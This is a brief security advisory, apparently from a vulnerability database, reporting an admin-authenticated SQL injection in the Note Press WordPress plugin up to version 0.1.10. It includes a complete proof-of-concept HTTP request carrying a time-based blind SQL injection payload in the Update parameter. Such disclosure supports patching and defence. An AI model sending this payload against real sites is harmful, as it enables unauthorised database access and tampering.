Note Press <= 0.1.10 - Admin+ SQLi via Update

The plugin does not sanitise and escape the Update parameter before using it in a SQL statement when updating a note via the admin dashboard, leading to an SQL injection

PoC

POST /wp-admin/admin.php?page=Note_Press-Main-Menu&action;=edit&id;=17 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&amp;action;=edit&amp;id;=17 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Origin: http://localhost DNT: 1 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=f5b4b02f56&Title;=Test&stickycolor;=&Deadline;=&Priority;=0&iconselect;%5B%5D=aablank.png&display;_name=admin&Note;_Presseditor=&Update;=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)